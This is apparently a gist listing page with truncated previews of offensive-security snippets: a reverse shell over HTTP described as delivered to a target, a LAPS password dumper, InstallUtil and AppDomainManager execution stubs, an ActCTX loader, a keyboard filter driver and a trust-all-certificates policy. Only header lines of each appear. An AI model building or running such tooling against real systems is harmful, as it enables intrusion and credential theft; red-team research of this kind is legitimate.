This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.ComponentModel; | |
using System.Runtime.InteropServices; | |
namespace ComWithoutRegisteringExample | |
{ | |
internal static class ComHelper | |
{ | |
private delegate int DllGetClassObject(ref Guid clsid, ref Guid iid, [Out, MarshalAs(UnmanagedType.Interface)] out IClassFactory classFactory); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Example Reference: | |
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
// Test | |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
// Change that C:\\Tools to a location you specify, or dynamically find current directory. | |
// ActCTX will search for the DLL in TMP | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
Read And Write Files Over WebDAV Proof Of Concept | |
.PARAMETER Server | |
Listening Server IP Address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sing System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdint.h> | |
#include <inttypes.h> | |
#include <winsock2.h> | |
#include <windns.h> | |
#include <windows.h> | |
#include <stdio.h> | |
#include <tlhelp32.h> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <wdm.h> | |
#include <ntddkbd.h> | |
// | |
// Per-device object extension | |
// | |
typedef struct _DEVICE_EXTENSTION | |
{ | |
// | |
// Driver must not be deleted as long as there is a pending IRP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE | |
import argparse | |
parser = argparse.ArgumentParser(description='Dump LAPS Passwords') | |
parser.add_argument('-u','--username', help='username for LDAP', required=True) | |
parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True) | |
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False) | |
parser.add_argument('-d','--domain', help='Domain', required=True) | |
parser.add_argument('-t', '--target', help="Target Domain", required=False) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <WinInet.h> | |
#include <ntsecapi.h> | |
void writeToLog(const char* szString) | |
{ | |
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
if (NULL == pFile) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
add-type @" | |
using System.Net; | |
using System.Security.Cryptography.X509Certificates; | |
public class TrustAllCertsPolicy : ICertificatePolicy { | |
public bool CheckValidationResult( | |
ServicePoint srvPoint, X509Certificate certificate, | |
WebRequest request, int certificateProblem) { | |
return true; | |
} | |
} |